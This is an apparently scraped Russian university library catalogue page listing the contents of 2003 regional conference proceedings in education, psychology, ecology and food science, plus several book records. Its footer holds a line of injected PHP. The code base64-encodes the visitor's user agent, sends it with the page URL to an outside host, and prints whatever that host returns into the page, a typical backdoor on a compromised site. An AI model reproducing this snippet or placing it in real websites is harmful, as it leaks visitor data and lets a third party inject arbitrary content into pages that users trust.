  • Четвергова, Наталья Евгеньевна. Моделирование структуры подготовки будущих учителей к работе с детьми в летнем оздоровительном лагере в рамках действующего стандарта / Н. Е. Четвергова. - с.64
  • Андреева, Т. В. О гражданской направленности личности студентов / Т. В. Андреева. - с.69
  • Сортыяков, Е. Д. О формировании навыков научной работы / Е. Д. Сортыяков. - с.72
  • Бобкова, М. Г. Проблема противоречий в обучении / М. Г. Бобкова. - с.75
  • Гербет, О. И. Доверие к себе как условие сохранения целостности личности / О. И. Гербет. - с.78
  • Ветрова, Н. Е. Развитие познавательной активности детей дошкольного возраста в игровой деятельности / Н. Е. Ветрова. - с.80
  • Старовойтова, Л. В. Психолого-педагогические условия развития познавательной активности детей младшего дошкольного возраста / Л. В. Старовойтова. - с.83
  • Подойма, Е. Ю. Об оптимальных стратегиях педагогического общения / Е. Ю. Подойма. - с.86
  • Колтыгина, Е. В. Оценка успешности информационной деятельности в диагностике психического развития школьников / Е. В. Колтыгина. - с.93
  • Куттыбаева, Н. Методика диагностики готовности детей к школе / Н. Куттыбаева. - с.96
  • Муханова, Г. Социальное окружение как фактор, влияющий на развитие личности / Г. Муханова. - с.101
  • Мардамшина, В. Применение метода "сказочного" семантического дифференциала в изучении личности школьника / В. Мардамшина. - с.107
  • Сычев, Олег Анатольевич. Отрицательный прогноз в общении в связи с фрустрацией базовых социальных потребностей / О. А. Сычев, О. Н. Дуракова. - с.109
  • Шубина, Л. В. Некоторые аспекты изучения творческого мышления / Л. В. Шубина. - с.113
  • Шагдарова, С. В. Социально-психологические особенности адаптации у детей-подростков / С. В. Шагдарова. - с.120
  • Глыбин, И. В. Синестезия акустических и визуальных ощущений / И. В. Глыбин. - с.120
  • Овчинников, Е. М. Понятие мотивации в психологии / Е. М. Овчинников. - с.121
  • Куксина, Н. А. Наркотическое цунами / Н. А. Куксина. - с.123
  • Суховеркова, Г. В. Психофизиологическое состояние студентов в процессе обучения в вузе / Г. В. Суховеркова. - с.125
  • Шумских, А. В. К проблеме методики преподавания психологии / А. В. Шумских. - с.132
  • Чинин, А. Н. Специфика обобщенных планов познавательной деятельности учащихся при изучении физики в системе развивающего обучения / А. Н. Чинин, О. П. Петрова. - с.134
  • Рупасова, Г. Б. Средства формирования приемов познавательной деятельности студентов при обучении физике по системе развивающего обучения / Г. Б. Рупасова. - с.136
  • Петров, А. В. Средства реализации эвристического подхода к физическим задачам в системе развивающего обучения / рук. работы. А. В. Петров. - с.138
  • Зеленкова, Т. Б. Особенности организации проектной работы в начальной школе / Т. Б. Зеленкова. - с.140
  • Карнаух, И. Е. Программно-тестовый подход к реализации принципа межпредметных связей в вузовском преподавании / И. Е. Карнаух. - с.143
  • Масалида, И. И. Использование математических знаний при решении задач по физике / И. И. Масалида. - с.144
  • Калинина, Н. И. Основные направления реализации исследовательской деятельности студентов в профессиональной подготовке учителя физики / Н. И. Калинина. - с.146
  • Андреева, Т. В. О гражданской направленности личности студентов / Т. В. Андреева. - с.149
  • Назарова, С. Н. Актуальность использования метода проектов в экологическом образовании младших школьников / С. Н. Назарова. - с.152
  • Назарова, С. Н. Воспитательные аспекты экологического образования младших школьников / С. Н. Назарова. - с.153
  • Сепетая, Н. Н. Развитие фонематического слуха у детей 4 - 6 лет / Н. Н. Сепетая. - с.154
  • Антюфьев, М. Ю. Реализация межпредметных связей в процессе моделирования уроков по физике / М. Ю. Антюфьев. - с.156
  • Будаева, Любовь Николаевна. О преподавании курса "Развивающее обучение в начальной школе / Л. Н. Будаева. - с.158
  • Караева, С. С. Современные требования к личности учителя музыки / С. С. Караева. - с.160
  • Ожогина, Е. В. Пластическое интонирование музыки как средства самовыражения ребенка / Е. В. Ожогина. - с.161
  • Мукушев, Б. А. Вопросы синергетики в содержании естественнонаучных дисциплин / Б. А. Мукушев. - с.162
  • Петровская, М. Н. Особенности освоения старшими дошкольниками художественного произведения / М. Н. Петровская. - с.166
  • Ланкина, Е. Е. Проблема активизации творчества младших школьников на уроках музыки / Е. Е. Ланкина, В. Солнцева. - с.169
  • Жемчужин, В. О. Анализ опыта разработки автоматизированной тестирующей программы / В. О. Жемчужин. - с.171
  • Сычев, Игорь Анатольевич. Диалог как средство активизации самостоятельной учебной деятельности учащихся старших классов на практических занятиях по информатике / И. А. Сычев. - с.174
  • Попова, Н. С. Проблема гуманизации содержания школьного математического образования / Н. С. Попова. - с.177
  • Петухов, А. Ю. Перспективы преподавания объектно-визуального программирования при обучении детей дошкольного возраста / А. Ю. Петухов. - с.179
  • Мошкин, Ю. Ю. Условия эффективного использования дистанционного обучения средствами Интернет / Ю. Ю. Мошкин. - с.182
  • Жунусова, Л. Х. Особенности компьютерного моделирования в управлении биосистем / Л. Х. Жунусова, Т. Н. Бияров. - с.185
  • Килибаева, С. К. Анализ процесса формирования и развития понятия из области электромагнетизма у учащихся старших классов / С. К. Килибаева, Б. Ш. Турысбекова, Б. М. Каланбеков. - с.188
  • Дорофеева, В. А. Особенности формообразования текста с эпиграфом после процедуры деформации / В. А. Дорофеева. - с.190
  • Волкова, А. М. Зачин как композиционно-структурный компонент текста / А. М. Волкова. - с.194
  • Михеева, М. С. Принципы семантизации и лексикализации слов / М. С. Михеева. - с.197
  • Пушкина, Е. С. Структурная организация и восприятие учебного текста / Е. С. Пушкина. - с.198
  • Коржнева, Елена Арнольдовна. Различные экспериментальные подходы к исследованию доминантного смысла текста / Е. А. Коржнева. - с.202
  • Моможокова, С. В. Сопоставительное изучение турецкого языка с алтайским / С. В. Моможокова. - с.208
  • Косинова, Л. А. Язык города как лингвосинергетический объект / Л. А. Косинова. - с.211
  • Солодянкина, Наталия Владимировна. Самоорганизация текста в аспекте изучения возрастных особенностей текстопорождения / Н. В. Солодянкина. - с.213
  • Бижан, Н. Б. Валовое содержание йода в почве и яровой пшенице в стадии кущения и колошения / Н. Б. Бижан. - с.218
  • Бузмакова, А. Г. Пути интеграции рыбоводства и тепличного овощеводства / А. Г. Бузмакова, Е. А. Грень. - с.219
  • Гулькина, Т. И. Сорбционная способность темно-каштановых почв Семипалатинского Прииртышья по отношению к ионам Pb2+ и Cu2+ / Т. И. Гулькина, А. М. Баирова. - с.220
  • Гайсина, Б. С. Валовое содержание йода в темно-каштановой почве и в различных сортах подсолнечника в стадии физиологической спелости / Б. С. Гайсина. - с.223
  • Панов, А. А. Оценка солево-минералогического состава вод / А. А. Панов. - с.224
  • Родикова, А. В. Проблемы экологии охраняемых территорий / А. В. Родикова. - с.226
  • Мубаракова, М. Ж. Тяжелые металлы (Pb, Cd, Zn,Cu) в атмосферных выпадениях на территории г. Семипалатинска / М. Ж. Мубаракова. - с.228
  • Куксина, Е. П. Изучение степени запыленности атмосферы с Алтайского / Е. П. Куксина, С. А. Огнева. - с.230
  • Огнева, С. А. К проблеме изучения гиполабильности микроэлементов в организме человека / С. А. Огнева. - с.231
  • Ордабаева, А. К. Содержание валового йода в растениях и почвах, взятых под различными сортами и на различных стадиях развития зерновых культур / А. К. Ордабаева. - с.233
  • Евлампиева, Е. П. Экотоксичность темно-каштановой почвы по отношению к проросткам яровой пшеницы при разных уровнях загрязнения цинком / Е. П. Евлампиева. - с.234
  • Екеева, А. Влияние физических факторов на урожайность некоторых растений / А. Екеева, Е. Баклыкова. - с.236
  • Танасенко, И. Биофизика экологии жилья / И. Танасенко, С. Тонкова. - с.237
  • Амиржанова, Г. З. Закономерности поведения кадмия в системе "светло-каштановая почва - проростки овса" при различной антропогенной нагрузке в условиях модельного опыта / Г. З. Амиржанова. - с.239
  • Толстихина, С. К проблеме акустического воздействия / С. Толстихина, М. Труфанова. - с.242
  • Карпова, Н. Г. Влияние солей тяжелых металлов на рост, развитие и активность ферментов Pisum Sativum / Н. Г. Карпова. - с.243
  • Браун, Л. История моей семьи в зеркале истории российских немцев / Л. Браун. - с.245
  • Байжуманова, Н. К. К вопросу о собирательстве кедрового ореха у кумандинцев в конце XIX - начале XX вв. / Н. К. Байжуманова. - с.250
  • Имидеева, И. В. Конкуренция и ее роль в развитии продовольственного рынка России / И. В. Имидеева, И. С. Цыренжапова. - с.252
  • Мирошников, Д. В. Теория человеческого капитала - основа экономического анализа высшей школы / Д. В. Мирошников. - с.253
  • Куттубаева, Т. А. Стратегический подход к профессиональной подготовке кадров на региональном рынке труда / Т. А. Куттубаева. - с.256
  • Назарова, О. Ю. Проблемы современного правового образования студентов педагогического вуза / О. Ю. Назарова. - с.260
  • Цыренжапова, И. С. Проблемы и перспективы развития малого предпринимательства в России / И. С. Цыренжапова, И. В. Имидеева. - с.264
  • Абдирова, А. Е. Уровень жизни и степень удовлетворения потребности населения в рыночных условиях / А. Е. Абдирова. - с.266
  • Лезнева, И. Ю. Рынок труда и занятость молодежи г. Бийска / И. Ю. Лезнева, О. В. Осипкова. - с.269
  • Чирков, Андрей Алексеевич. Крестьянское движение и община на Алтае в 1917 году / А. А. Чирков. - с.272
  • Колокольников, Р. О. Опыт внедрения системы управления финансами промышленного предприятия / Р. О. Колокольников. - с.277
  • Бегалинова, М. С. сущность и проблемы методологии образования в XXI веке / М. С. Бегалинова. - с.280
  • Бегалинова, М. С. Единство биосферы и человека / М. С. Бегалинова, А. С. Сансызбай. - с.284
  • Побережная, О. Н. Гражданское образование в "хрупком мире". Преодолевая ловушку модернизации / О. Н. Побережная. - с.288
  • Пекарская, Е. А. Влияние власти на формирование личности / Е. А. Пекарская. - с.292
  • Квашина, Е. В. Особенности развития идеи демократизации образования в России / Е. В. Квашина. - с.295
  • Казакова, Е. Сравнение направленности ценностных ориентаций российских и американских старшеклассников / Е. Казакова, Е. Худякова. - с.297
  • Фефелова, Е. Отношение тинейджеров к курению / Е. Фефелова. - с.300
  • Арефьев, Р. Л. Развитие личности и христианская религия / Р. Л. Арефьев. - с.303
  • Андреева, Е. В. Изучение антропологической готовности будущего учителя / Е. В. Андреева. - с.304
  • Юрова, О. А. Проблемы развития духовно-экологического туризма в Горном Алтае / О. А. Юрова. - с.310
  • Щапова, С. М. Дистанционное образование в системе обучения и повышения квалификации научно-педагогических кадров высшей школы / С. М. Щапова. - с.313
  • Горшунова, Татьяна Игоревна. Феномен американской улыбки / Т. И. Горшунова. - с.316
  • Бухарова, Т. Н. Эстетические идеи романтизма в музыке и их значение для современного музыкального образования / Т. Н. Бухарова. - с.319
  • Кучерова, Ю. В. Проблемы сохранения певческой традиции в старообрядческой культуре / Ю. В. Кучерова. - с.320
  • Кузнецова, Т. В. Мировоззрение и творчество / Т. В. Кузнецова. - с.322
  • Карпова, Н. Г. Личность как ценностная категория в философском учении Н. А. Бердяева / Н. Г. Карпова. - с.323
  • Комелькова, Л. А. Языческий мотивы в творчестве русских композиторов / Л. А. Комелькова. - с.325
  • Попов, И. В. К вопросу о конкурентоспособности выпускников педагогических вузов / И. В. Попов : 326
  • Горячкина, Е. Б. Исследование материала для изготовления термолюминесцентных детекторов ТЛД-К / Е. Б. Горячкина, Н. В. Сорокина. - с.331
  • Гаврилова, Я. Ю. Исследование процесса структурообразования молочно-соевых плавленых сыров / Я. Ю. Гаврилова. - с.333
  • Проскурина, В. Л. Новые технологи производства молочных десертов / В. Л. Проскурина. - с.334
  • Любимов, А. Г. Перспективная технология молочных продуктов с растительными полисахаридами / А. Г. Любимов. - с.337
  • Широкова, Е. Н. Творожные изделия лечебно-профилактического назначения / Е. Н. Широкова. - с.339
  • Акулова, Д. С. Применение энтеросорбентов в производстве экологически чистых пищевых продуктов / Д. С. Акулова, К. С. Жарыкбасова. - с.340
  • Шайхина, А. В. Перспективы разработки технологии молочных продуктов для специализированного питания / А. В. Шайхина. - с.342
Держатели документа (Информация об экземплярах) 
9. 
Наука и образование : проблемы и перспективы : материалы региональной научно-практической конференции аспирантов, студентов и учащихся (18 - 19 апреля 2003 г.) : в 2-х ч.Ч. 1 / науч. ред. Н. А. Манаков, 2003. - 268 с.
Ключевые слова 
Оглавление 
  • Андреева, И. В. Развитие приемов логического мышления младших школьников на уроках математики / И. В. Андреева. - с.3
  • Андреева, Ирина Николаевна. Роль дидактической игры в воспитании гуманных взаимоотношений старших дошкольников / И. Н. Андреева. - с.2
  • Антонова, Марина Валерьевна. Влияние живописи и литературы на развитие речевых коммуникаций старших дошкольников / М. В. Антонова. - с.8
  • Ахметгалеева, З. М. Полоролевые идентификации при формировании Я-концепции в юношеском возрасте / З. М. Ахметгалеева. - с.11
  • Бауэр, Е. А. Развитие правильного звукопроизношения у умственно отсталых дошкольников посредством дидактических игр / Е. А. Бауэр. - с.15
  • Белькова, О. Ю. Развитие ответственности детей дошкольного возраста / О. Ю. Белькова. - с.18
  • Беспалова, Наталия Николаевна. Психофизиологическое развитие детей, воспитывающихся вне семьи / Н. Н. Беспалова. - с.21
  • Будич, Н. Ю. Уверенность в себе / Н. Ю. Будич. - с.24
  • Бурняшева, К. В. Развитие рефлексивного компонента продуктивного опыта младших школьников / К. В. Бурняшева. - с.28
  • Данилина, Т. В. Развитие грамматического строя речи у детей младшего дошкольного возраста посредством дидактических игр / Т. В. Данилина. - с.31
  • Дмитриевская, Вера Николаевна. Развитие коммуникативной компетенции как одно из условий развития личности младших школьников / В. Н. Дмитриевская. - с.33
  • Дмитриевский, А. А. К вопросу о личности как источнике психологических ресурсов / А. А. Дмитриевский. - с.36
  • Жемерина, Н. Г. Развитие цветовосприятия у старших дошкольников / Н. Г. Жемерина. - с.38
  • Жилякова, Л. К вопросу о развитии музыкального воображения у детей / Л. Жилякова. - с.39
  • Жукова, Е. А. Влияние мотивационно-ценностного отношения к труду на развитие образа "Я" младшего школьника / Е. А. Жукова. - с.41
  • Казанцева, О. А. Индивидуально-типические особенности ответственности / О. А. Казанцева. - с.44
  • Каширина, Л. А. Ошибки речи как фактор неуспеваемости младших школьников / Л. А. Каширина. - с.51
  • Керноз, О. С. Возрастные особенности ответственности / О. С. Керноз. - с.55
  • Колпакова, А. Д. Стиль педагогического общения как фактор формирования мотивационного отношения младших школьников к учебной деятельности / А. Д. Колпакова. - с.58
  • Кречетова, Ю. В. Творческое самовыражение учителя музыки / Ю. В. Кречетова. - с.64
  • Криволуцкая, Е. В. Педагогические условия развития творческих способностей детей дошкольного возраста / Е. В. Криволуцкая. - с.66
  • Кугай, Ольга Бахроновна. Реализация индивидуального подхода к леворуким учащимися в ДМШ при обучении игры на фортепиано / О. Б. Кугай. - с.69
  • Кузнецова, Т. В. Интегрированные домашние задания как условия предупреждения утомления младших школьников / Т. В. Кузнецова. - с.71
  • Кулакова, Д. В. Особенности проявления базовых личностных качеств подростка и необходимость их развития и коррекции средствами психологического воздействия / Д. В. Кулакова. - с.73
  • Лампман, В. Е. Влияние русских народных праздников на воспитание нравственного поведения детей старшего дошкольного возраста / В. Е. Лампман. - с.76
  • Литусова, Н. В. Развитие интонационной стороны речи детей среднего дошкольного возраста на занятиях по физическому воспитанию / Н. В. Литусова. - с.79
  • Марина, И. Е. Необходимость знания психологических особенностей юношества для предупреждения суицида / И. Е. Марина. - с.84
  • Петрова, О. Н. Общение как фактор воспитания личности младшего школьника / О. Н. Петрова. - с.87
  • Плесовских, Е. А. Влияние развития мелкой моторики кисти руки на речь дошкольника / Е. А. Плесовских. - с.89
  • Рычкова, Т. А. Личностно-ориентированное обучение дошкольников / Т. А. Рычкова. - с.91
  • Сажина, Елена. "Ученик познающий" как цель образовательного процесса / Е. Сажина. - с.93
  • Табакаева, Е. Н. Формирование познавательной активности учащихся / Е. Н. Табакаева. - с.96
  • Шубина, Л. В. Сравнительный анализ проявления любознательности учащихся с различным уровнем развития творческого мышления / Л. В. Шубина. - с.99
  • Шубина, Л. В. Направленность любознательности младших школьников с различным уровнем развития творческого мышления / Л. В. Шубина. - с.105
  • Алексеева, И. Н. Минимальная мозговая дисфункция с точки зрения современных психологов (актуальные вопросы) / И. Н. Алексеева. - с.107
  • Герасимов, А. В. Мотивация персонала к труду как аспект самоактуализации личности / А. В. Герасимов, О. А. Астаева. - с.110
  • Герасимов, А. В. Влияние потребностей на мотивационные отношения персонала к труду / А. В. Герасимов. - с.118
  • Герасимов, А. В. Мотивационные отношения и ценностные предпочтения субъекта / А. В. Герасимов. - с.122
  • Дроздов, А. П. Изменение гендерных ролей современного человека / А. П. Дроздов. - с.127
  • Ищенко, Е. В. Мозговые корреляты ригидности / Е. В. Ищенко. - с.129
  • Лямина, О. А. Роль социально-психологических факторов в вынашивании беременности / О. А. Лямина. - с.134
  • Назарова, В. Е. Некоторые вопросы истории становления психологии музыкального восприятия / В. Е. Назарова. - с.140
  • Повстян, Л. А. Системный подход к обоснованию развивающегося значения эстетических впечатлений в процессе арт-терапии / Л. А. Повстян. - с.148
  • Танасенко, И. В. Электрофизика человека / И. В. Танасенко, С. Е. Тонкова. - с.156
  • Толстихина, С. Ю. Биофизика памяти / С. Ю. Толстихина, М. Ю. Труфанова. - с.157
  • Фебенчукова, Анна Васильевна. Мозговые корреляты поведения субъекта / А. В. Фебенчукова, А. В. Фебенчуков. - с.158
  • Акжаркенова, Любовь Григорьевна. Педагогические основы управления внеучебной деятельностью учащихся (история вопроса) / Л. Г. Акжаркенова, М. Б. Исаева. - с.163
  • Беляева, Нина Игнатьевна. Самостоятельная работа по выбору - важное средство активизации познавательной активности студентов при изучении педагогических дисциплин / Н. И. Беляева. - с.168
  • Вдовин, Алексей Сергеевич. Процесс обучения / А. С. Вдовин. - с.171
  • Вдовин, Роман Сергеевич. Учет психологии учащихся в процессе современного педагогического тестирования / Р. С. Вдовин. - с.175
  • Вострецова, О. С. Патриотическое воспитание младших школьников как важный компонент формирования гражданской позиции / О. С. Вострецова. - с.178
  • Горчакова, Е. М. Формирование коммуникативных умений в процессе профессиональной подготовки педагога / Е. М. Горчакова. - с.181
  • Емельянова, И. В. Проблема организации научно-исследовательской деятельности студентов и пути ее решения / И. В. Емельянова. - с.182
  • Зотова, Татьяна Николаевна. Модель реализации преемственности в системе "ДОУ - начальная школа" / Т. Н. Зотова. - с.185
  • Иванова, О. Домашняя работа как средство формирования отношений "ученик - родители" / О. Иванова. - с.189
  • Иванова, Т. Школа будущего рождается уже сегодня / Т. Иванова. - с.190
  • Карпова, Н. Г. Педагогические аспекты преемственности общего и вузовского образования / Н. Г. Карпова. - с.193
  • Косова, Л. Н. Анализ эффективности учреждений дополнительного образования детей / Л. Н. Косова. - с.195
  • Левина, Марина Николаевна. Координация - основное условие функционирования ДОУ в образовательном пространстве / М. Н. Левина. - с.199
  • Михайленко, Т. Н. Коллективная творческая деятельность как средство подготовки учащихся к выбору профессии / Т. Н. Михайленко. - с.201
  • Назарова, А. Е. Педагогическая деятельность выдающихся музыкантов-исполнителей как фактор формирования отечественной пианистической школы / А. Е. Назарова. - с.204
  • Никитина, Елена Юрьевна. Проблемное обучение как фактор повышения эффективности процесса обучения / Е. Ю. Никитина. - с.207
  • Николаева, А. И. Внеклассная работа по математике в начальной школе / А. И. Николаева. - с.211
  • Падюков, Андрей Константинович. Творческий проект как основа предпрофильного и профильного обучения учащихся сельских школ / А. К. Падюков. - с.213
  • Петрова, Н. А. Разноуровневые задания как средство подготовки младших школьников к выбору профессии / Н. А. Петрова. - с.219
  • Петров, А. В. Развивающая и развивающаяся система образования XXI века / А. В. Петров. - с.222
  • Плотицына, Л. В. Реализация индивидуальных образовательных маршрутов на примере дисциплины "Графика" / Л. В. Плотицына, Е. В. Корначаева. - с.228
  • Поданева, М. А. Формирование профессиональной направленности студентов через реализацию межпредметных связей / М. А. Поданева. - с.231
  • Реутова, О. Г. История образования Кузнецкого края за 300 лет (XVII - XXI вв.) / О. Г. Реутова. - с.233
  • Романова, Л. А. Специфика деятельности организатора, руководителя и управленца в воспитательной работе факультета / Л. А. Романова. - с.236
  • Салькова, Т. М. Профессиональная мини-проба как средство подготовки младших школьников к выбору профессии / Т. М. Салькова. - с.240
  • Серебренникова, И. А. Средства и приемы реализации межпредметных связей / И. А. Серебренникова. - с.243
  • Синдеева, К. А. Национальная доктрина образования в Российской Федерации / К. А. Синдеева. - с.249
  • Сухих, М. Проспект деловой игры "Классный руководитель" / М. Сухих. - с.253
  • Терехина, М. В. Состояние тестирования в России / М. В. Терехина. - с.256
Держатели документа (Информация об экземплярах) 
10. 
Минин, Борис Алексеевич. СВЧ и безопасность человека [Текст] / Б. А. Минин ; под ред. М. М. Левина, 1974. - 351 с.
Держатели документа (Информация об экземплярах) 
11. 
Детская энциклопедия [Текст] : для сред. и ст. возраста: [в 12 т.] / Акад. пед. наук СССР; редкол.: А. И. Маркушевич [и др.]. Т. 4 : Растения и животные / науч. ред.: А. Г. Банников, П. А. Генкель, 1973. - 447, [1] с.
Держатели документа (Информация об экземплярах) 
12. 
Ремизов, Александр Николаевич. Медицинская и биологическая физика [Текст] : Учеб. для мед. специальностей вузов / А. Н. Ремизов, 1999. - 616 с.
Держатели документа (Информация об экземплярах) 
13. 
Чижевский, Александр Леонидович. Аэроины и жизнь. Беседы с Циолковским [Текст] / А. Л. Чижевский; Л. В. Голованов, 1999. - 716 с.
Держатели документа (Информация об экземплярах) 
14. 
Чеусова, Елена Петровна. Корреляционные сдвиги при адаптации: моделирование и кластер-анализ [Текст] : Автореф. дис. .. канд. техн. наук: 05.13.16 / Е. П. Чеусова, 1997. - 22 с.
Держатели документа (Информация об экземплярах) 
15. 
Райх, Вильгельм. Анализ личности [Текст] / В. Райх; С. Ю. Романюк, Л. М. Шлионский, 1999. - 332 с.
Держатели документа (Информация об экземплярах) 
16. 
APS Journals [Электронный ресурс] : [Виртуальные журналы Американского физического общества] / Американское физическое общество, Б. г. r=on-line
Держатели документа (Информация об экземплярах) 
Полный текст
17. 
Доклады Академии наук СССР [Текст] : сист. указ. к т. 1-1-155 за 1955-1964 гг. / АН СССР, БАН СССР, 1967. - 833 с.
Держатели документа (Информация об экземплярах) 
18. 
Миллиметровые волны и фотосинтезирующие организмы [Текст] : Моногр. / А. Х. Тамбиев, Н. Н. Кирикова, О. В Бецкий, Ю. В. Гуляев; Под ред. Ю. В. Гуляева, А. Х. Тамбиева, 2003. - 174, [1] с.
Держатели документа (Информация об экземплярах) 
19. 
Волькенштейн, Михаил Владимирович. Биофизика [Текст] / М. В. Волькенштейн, 1988. - 591 с.
Ключевые слова 
МОЛЕКУЛЯРНАЯ -- КЛЕТКА -- СЛОЖНАЯ -- СИСТЕМА -- БИОЛОГИЧЕСКАЯ -- ЭВОЛЮЦИЯ -- ФИЗИКА -- МАКРОМОЛЕКУЛЫ -- БЕЛКА -- МЕМБРАНЫ -- ФЕРМЕНТА -- НУКЛЕИНОВОЙ -- КИСЛОТЫ -- БИОСИНТЕЗ -- НЕРВНОГО -- ИМПУЛЬСА -- БИОПОЛИМЕР -- НЕРАВНОВЕСНАЯ -- ТЕРМОДИНАМИКА -- МЕХАНОХИМИЧЕСКИЙ -- ПРОЦЕСС -- ФОТОБИОЛОГИЧЕСКИЙ -- ДИНАМИЧЕСКИЙ -- БИОЛОГИЧЕСКИЙ -- ХИМИЧЕСКИЙ -- ДЫХАТЕЛЬНАЯ -- ЦЕПЬ -- БИОЭНЕРГЕТИКА -- ТОПОЛОГИЯ -- ДНК -- ХИМИЯ -- БИОНЕОРГАНИЧЕСКАЯ -- БИОЛОГИЧЕСКОЕ -- РАЗВИТИЕ -- УЧЕБНИК И ПОСОБИЕ
Держатели документа (Информация об экземплярах) 
20. 
Шауб, Юрий Борисович. Кондуктометрия [Текст] / Ю. Б. Шауб, 1996. - 488 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3107 - 12.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 6.10 с.12 запросов, 5.49c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;